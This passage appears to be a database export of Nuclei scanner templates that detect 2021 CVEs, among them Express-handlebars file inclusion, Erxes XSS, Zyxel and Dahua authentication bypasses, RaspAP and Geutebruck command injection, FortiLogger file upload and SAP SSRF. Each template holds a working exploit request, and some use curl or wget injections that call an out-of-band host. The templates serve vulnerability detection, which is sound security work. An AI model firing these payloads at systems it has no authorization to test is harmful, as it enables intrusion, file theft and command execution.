5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835d" }, "name": "CVE-2021-32820.yaml", "content": "id: CVE-2021-32820\n\ninfo:\n name: Express-handlebars - Local File Inclusion\n author: dhiyaneshDk\n severity: high\n 
description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Update to the latest version of Express-handlebars to mitigate the vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/\n - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json\n - https://github.com/express-handlebars/express-handlebars/pull/163\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32820\n - https://github.com/express-handlebars/express-handlebars/blob/78c47a235c4ad7bc2674bddd8ec2721567ed8c72/README.md#danger-\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2021-32820\n cwe-id: CWE-94,CWE-200\n epss-score: 0.01304\n epss-percentile: 0.85598\n cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: express_handlebars_project\n product: express_handlebars\n framework: node.js\n tags: cve2021,cve,expressjs,lfi,xxe,express_handlebars_project,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?layout=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n 
regex:\n - \"root:.*:0:0:\"\n - \"daemon:[x*]:0:0:\"\n - \"operator:[x*]:0:0:\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022069731ef6aa77f47e6209c6404ff6b4a5d8869413afa7d0197169a84bafb57ecc02203e27a5de4cb4ef4f62b3a78fddfdba82002813f1c55df47fcbbf83b0c7bf4da3:922c64590222798bb761d5b6d8e72950", "hash": "181b74520dd0228ffe3e878e3ab3b665", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835e" }, "name": "CVE-2021-32853.yaml", "content": "id: CVE-2021-32853\n\ninfo:\n name: Erxes <0.23.0 - Cross-Site Scripting\n author: dwisiswant0\n severity: critical\n description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32853\n - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14\n - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n cvss-score: 9.6\n cve-id: CVE-2021-32853\n cwe-id: CWE-79\n epss-score: 0.01224\n epss-percentile: 0.83856\n cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: erxes\n product: erxes\n shodan-query: http.title:\"erxes\"\n tags: cve2021,cve,xss,erxes,oss\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'topic_id: \"'\n - \"window.erxesEnv\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207aed0ce8a782de56c716be549d8c4fa15f2cbf9113c348db56bdfc9910776782022100a891ca50a47ab7c7ce36f2e1498bb7e8f44b168bfecfb59396015929d2525eb4:922c64590222798bb761d5b6d8e72950", "hash": "dbd32cc7aba3fa2f5e5ed9b55273de81", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835f" }, "name": "CVE-2021-3293.yaml", "content": "id: CVE-2021-3293\n\ninfo:\n name: emlog 5.3.1 Path Disclosure\n author: h1ei1\n severity: medium\n description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.\n impact: |\n An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks.\n remediation: |\n Apply the latest patch or upgrade to a version that fixes the vulnerability.\n reference:\n - https://github.com/emlog/emlog/issues/62\n - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3293\n - https://github.com/Z0fhack/Goby_POC\n - https://github.com/20142995/Goby\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-3293\n cwe-id: CWE-22\n epss-score: 0.003\n epss-percentile: 0.68887\n cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: emlog\n product: emlog\n tags: cve2021,cve,emlog,fpd\n\nhttp:\n - raw:\n - |\n GET /t/index.php?action[]=aaaa HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Warning\"\n - \"on line\"\n - 
\"expects parameter\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210096f3228cc4d490adee40d190e6f8d36714ca2e536391b5d273c5a498468135e3022055c714b2300176f083a94f6f93884821c80b2f2a760acd3453b6f62efaef4744:922c64590222798bb761d5b6d8e72950", "hash": "bd983c18ab9f2efc3f3f2df8b4d7e976", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308360" }, "name": "CVE-2021-3297.yaml", "content": "id: CVE-2021-3297\n\ninfo:\n name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass\n author: gy741\n severity: high\n description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential compromise of the affected device.\n remediation: |\n Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability.\n reference:\n - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass\n - https://www.zyxel.com/us/en/support/security_advisories.shtml\n - https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3297\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2021-3297\n cwe-id: CWE-287\n epss-score: 0.1939\n epss-percentile: 0.96173\n cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\\(aagu.2\\)c0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zyxel\n product: nbg2105_firmware\n tags: cve,cve2021,zyxel,auth-bypass,router\n\nhttp:\n - raw:\n - |\n GET /status.htm HTTP/1.1\n Host: {{Hostname}}\n Cookie: language=en; login=1\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Running Time\"\n - 
\"Firmware Version\"\n - \"Firmware Build Time\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022063e3bd0343c282a0777ee7560b660fb802857d90d8db48f45a676f645bede369022100cbf65f25ecaeef1a1dfd59c493ad4d4286d2d866d00c53c917c2e47af040abee:922c64590222798bb761d5b6d8e72950", "hash": "d05b64ab83408b1efac7b1e800fb3e0d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308361" }, "name": "CVE-2021-33044.yaml", "content": "id: CVE-2021-33044\n\ninfo:\n name: Dahua IPC/VTH/VTO - Authentication Bypass\n author: gy741\n severity: critical\n description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.\n impact: |\n An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system.\n remediation: |\n Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability.\n reference:\n - https://github.com/dorkerdevil/CVE-2021-33044\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33044\n - https://seclists.org/fulldisclosure/2021/Oct/13\n - https://www.dahuasecurity.com/support/cybersecurity/details/957\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-33044\n cwe-id: CWE-287\n epss-score: 0.29051\n epss-percentile: 0.96446\n cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dahuasecurity\n product: ipc-hum7xxx_firmware\n tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity\n\nhttp:\n - raw:\n - |\n POST /RPC2_Login HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, */*; q=0.01\n Connection: close\n X-Requested-With: XMLHttpRequest\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n\n {\"id\": 1, \"method\": 
\"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"result\":true'\n - 'id'\n - 'params'\n - 'session'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - ',\"result\":true,\"session\":\"([a-z]+)\"\\}'\n part: body\n# digest: 4a0a00473045022100969dc816553940d4ba45200da238d7df4503480847dc4729f24dbeea283d51b302203e3bc11853da98fc6f17ca80f318604a3a94eb5fd28376a5c321efee7f7d1358:922c64590222798bb761d5b6d8e72950", "hash": "8bcc0e57b1344a644eecbb5b75219a14", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308362" }, "name": "CVE-2021-33221.yaml", "content": "id: CVE-2021-33221\n\ninfo:\n name: CommScope Ruckus IoT Controller - Information Disclosure\n author: geeknik\n severity: critical\n description: CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. 
A fully configured device in production may leak other, more sensitive information (API keys and tokens).\n impact: |\n Successful exploitation of this vulnerability could result in the exposure of sensitive data, potentially leading to further attacks or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by CommScope to mitigate the information disclosure vulnerability (CVE-2021-33221).\n reference:\n - https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf\n - http://seclists.org/fulldisclosure/2021/May/72\n - https://korelogic.com/advisories.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33221\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-33221\n cwe-id: CWE-306\n epss-score: 0.23566\n epss-percentile: 0.96154\n cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: commscope\n product: ruckus_iot_controller\n tags: cve2021,cve,commscope,ruckus,debug,service,leak,seclists\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/service/v1/service-details\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: word\n words:\n - \"message\"\n - \"ok\"\n - \"data\"\n - \"dns\"\n - \"gateway\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022040d9f901c377c371535d5eba601ba2641df74547f351de738a7d9b290daf6b90022042c17f7955d7e8c548d6ad429ee8db2ad8bfca849b19d888de7d37efc4a14b75:922c64590222798bb761d5b6d8e72950", "hash": "c09f94bc897845fac4c086ae92bd3a35", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308363" }, "name": "CVE-2021-33357.yaml", "content": "id: CVE-2021-33357\n\ninfo:\n name: RaspAP <=2.6.5 - Remote Command Injection\n author: pikpikcu,pdteam\n severity: critical\n 
description: |\n RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the \"iface\" GET parameter in /ajax/networking/get_netcfg.php, when the \"iface\" parameter value contains special characters such as \";\".\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the integrity and confidentiality of the affected system.\n remediation: |\n Upgrade RaspAP to a version higher than 2.6.5 to mitigate the vulnerability.\n reference:\n - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/\n - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf\n - https://github.com/RaspAP/raspap-webgui\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33357\n - https://github.com/20142995/Goby\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-33357\n cwe-id: CWE-78\n epss-score: 0.96502\n epss-percentile: 0.99569\n cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: raspap\n product: raspap\n tags: cve2021,cve,rce,raspap,oast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n words:\n - \"DHCPEnabled\"\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 'GET \\/([a-z-]+) HTTP'\n part: interactsh_request\n# digest: 4b0a00483046022100a36fdff828bec618e9c78788bae9076907c04531b09578a93abe65de10f97b25022100a506a1278139dae39fbaa6f9678143001d0560355b56762dfce83af689ef65f9:922c64590222798bb761d5b6d8e72950", "hash": "3fa99a9cf78ba6cbbb4aec9e4a2b001c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308364" }, "name": "CVE-2021-33544.yaml", "content": "id: CVE-2021-33544\n\ninfo:\n name: Geutebruck - Remote Command 
Injection\n author: gy741\n severity: high\n description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network.\n remediation: |\n Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability.\n reference:\n - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\n - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/\n - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33544\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-33544\n cwe-id: CWE-78\n epss-score: 0.9753\n epss-percentile: 0.99991\n cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: geutebrueck\n product: g-cam_ebc-2110\n tags: cve2021,cve,geutebruck,rce,oast,geutebrueck\n\nhttp:\n - raw:\n - |\n GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 
4b0a00483046022100f37bc917cbc8b527d545f16cfed837d2affcbba4fa29c559bdf237631cfd5b0e022100d96a76e1037df09d7c06602c2e942944102c3c42fe92225ea7aa74c76e9100b9:922c64590222798bb761d5b6d8e72950", "hash": "43a2bd9509ef09f7bb83926aead259d2", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308365" }, "name": "CVE-2021-33564.yaml", "content": "id: CVE-2021-33564\n\ninfo:\n name: Ruby Dragonfly <1.4.0 - Remote Code Execution\n author: 0xsapra\n severity: critical\n description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability.\n reference:\n - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/\n - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0\n - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5\n - https://github.com/mlr0p/CVE-2021-33564\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33564\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-33564\n cwe-id: CWE-88\n epss-score: 0.07547\n epss-percentile: 0.93983\n cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:*\n metadata:\n max-request: 2\n vendor: dragonfly_project\n product: dragonfly\n framework: ruby\n tags: cve2021,cve,rce,ruby,injection,dragonfly_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==\"\n - 
\"{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220767731dd7d7a2c3704e8f37718260e27d179b1fcdee83f7a23fae684f8521a29022100dd6fabe448035967b1ffc254f7bff91f427de7816c3a09d2f32288da56f8e877:922c64590222798bb761d5b6d8e72950", "hash": "d414b8dc4838151c433a47335b544b56", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308366" }, "name": "CVE-2021-33690.yaml", "content": "id: CVE-2021-33690\n\ninfo:\n name: SAP NetWeaver Development Infrastructure - Server Side Request Forgery\n author: DhiyaneshDK\n severity: critical\n description: |\n Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. 
The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.\n remediation: Apply SAP Security Note 3072955 (listed in the references) to the NWDI Component Build Service to mitigate this vulnerability; NetWeaver is server software, so there is no vendor firmware to update.\n reference:\n - https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33690\n - https://launchpad.support.sap.com/#/notes/3072955\n - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806\n - https://github.com/redrays-io/CVE-2021-33690\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9.9\n cve-id: CVE-2021-33690\n cwe-id: CWE-918\n epss-score: 0.3856\n epss-percentile: 0.97133\n cpe: cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sap\n product: netweaver_development_infrastructure\n shodan-query: html:\"SAP NetWeaver\"\n tags: cve2021,cve,oast,ssrf,sap\n\nhttp:\n - raw:\n - |\n POST /tc.CBS.Appl/tcspseudo HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n CBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"Could not connect to the CBS\"\n# digest: 490a00463044022027727d913e7044670a5cfc2a318a45aac111b189bee52347b9a90933cf5c801b022011d1873dee71de17c4f6b36800ac5b17f4129ced9b5bba0e86ef087c08c08dd0:922c64590222798bb761d5b6d8e72950", "hash": "bcf757a46d8229cc9f79fa0c6e9a4c76", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308367" }, "name": "CVE-2021-3374.yaml", "content": "id: CVE-2021-3374\n\ninfo:\n name: Rstudio Shiny Server <1.5.16 - Local File Inclusion\n author: geeknik\n severity: medium\n description: Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. 
This can be exploited by appending an encoded slash to the URL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially exposing sensitive information.\n remediation: |\n Upgrade Rstudio Shiny Server to version 1.5.16 or later to mitigate the vulnerability.\n reference:\n - https://github.com/colemanjp/shinyserver-directory-traversal-source-code-leak\n - https://blog.rstudio.com/2021/01/13/shiny-server-1-5-16-update/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3374\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-3374\n cwe-id: CWE-22\n epss-score: 0.00235\n epss-percentile: 0.61534\n cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:*\n metadata:\n max-request: 2\n vendor: rstudio\n product: shiny_server\n tags: cve2021,cve,rstudio,traversal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2f/\"\n - \"{{BaseURL}}/sample-apps/hello/%2f/\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Index of /\"\n\n - type: regex\n part: body\n regex:\n - \"[A-Za-z].*\\\\.R\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b1c465a83bf095eaab8ef309c15df15310aa6724bc213fa50af8c7323174d4da022100efa38cb1a731ed0c095c6017209cd82a727de7f44d25f48b8efaefbbab8721a3:922c64590222798bb761d5b6d8e72950", "hash": "48e245a59c727761a79bc24e9d5fa735", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308368" }, "name": "CVE-2021-3377.yaml", "content": "id: CVE-2021-3377\n\ninfo:\n name: npm ansi_up v4 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft 
or unauthorized actions.\n remediation: Upgrade to v5.0.0 or later.\n reference:\n - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf\n - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3377\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-3377\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.46774\n cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: ansi_up_project\n product: ansi_up\n framework: node.js\n tags: cve2021,cve,xss,npm,ansi_up_project,node.js\n\nhttp:\n - raw:\n - |+\n GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n words:\n - \"sh\\\"/onmouseover=\\\"alert(1)\\\">\"\n# digest: 490a0046304402200be98ecd1e9d686de76a80e1b6ba45a22113eba83e6af3420ff0a2c5f8e704cb0220421807456b96e3079452c53c16bc561a5906c0c939ece2763ade16a573e0acb6:922c64590222798bb761d5b6d8e72950", "hash": "cc44d51585f52e60fb0516ca6b3b488f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308369" }, "name": "CVE-2021-3378.yaml", "content": "id: CVE-2021-3378\n\ninfo:\n name: FortiLogger 4.4.2.2 - Arbitrary File Upload\n author: dwisiswant0\n severity: critical\n description: |\n FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. 
Attackers can send a \"Content-Type: image/png\" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of FortiLogger to mitigate this vulnerability.\n reference:\n - https://erberkan.github.io/2021/cve-2021-3378/\n - https://github.com/erberkan/fortilogger_arbitrary_fileupload\n - http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html\n - http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html\n - https://github.com/SYRTI/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-3378\n cwe-id: CWE-434\n epss-score: 0.46039\n epss-percentile: 0.97333\n cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: fortilogger\n product: fortilogger\n tags: cve,cve2021,fortilogger,fortigate,fortinet,packetstorm,fileupload,intrusive\n\nhttp:\n - raw:\n - |\n POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\n Accept: application/json\n Referer: {{BaseURL}}\n Connection: close\n X-Requested-With: XMLHttpRequest\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\n Content-Type: image/png\n\n {{randstr}}\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n - |\n GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"{{randstr}}\"\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n - \"ASP.NET\"\n condition: and\n\n - type: status\n status:\n - 
200\n# digest: 4b0a004830460221009ca6ec31fff128d598adf60dee1493944a7ab52755ca4f6499b9c9e753b6527d02210099391061cf59dbd9935b6a7d1a7083e8452a818b33747499e433c09616fb636e:922c64590222798bb761d5b6d8e72950", "hash": "f7cb38c54e4e12279fd7f53a977674ce", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836a" }, "name": "CVE-2021-33807.yaml", "content": "id: CVE-2021-33807\n\ninfo:\n name: Cartadis Gespage 8.2.1 - Directory Traversal\n author: daffainfo\n severity: high\n description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system.\n remediation: |\n Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1.\n reference:\n - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf\n - 